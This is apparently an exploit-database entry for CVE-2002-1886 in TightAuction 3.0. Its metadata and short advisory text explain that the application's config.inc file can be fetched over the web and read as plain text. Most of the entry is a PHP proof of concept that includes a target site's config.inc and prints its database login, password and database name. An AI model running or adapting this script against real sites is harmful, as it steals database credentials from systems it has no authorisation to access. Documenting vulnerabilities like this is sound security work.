TightAuction 3.0 - Config.INC Information Disclosure
Author: frog
type: webapps
platform: php
port:
date_added: 2002-10-02
date_updated: 2012-10-11
verified: 1
codes: CVE-2002-1886;OSVDB-59605
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/5850/info
TightAuction is prone to an information disclosure vulnerability. The configuration file (config.inc) contains sensitive information such as database authentication credentials. It is possible for remote attackers to retrieve this file via a web request, and since the file does not have the correct extension (.inc.php) the contents will be rendered in a web browser instead of interpreted.
<?
$victime="http://[target]";
include("$victime/config.inc");
print("Infos de la DataBase du site $victime : \n \n");
print("Login : $DB_Username \nPassword : $DB_Password \nServer :
$DB_Database");
?>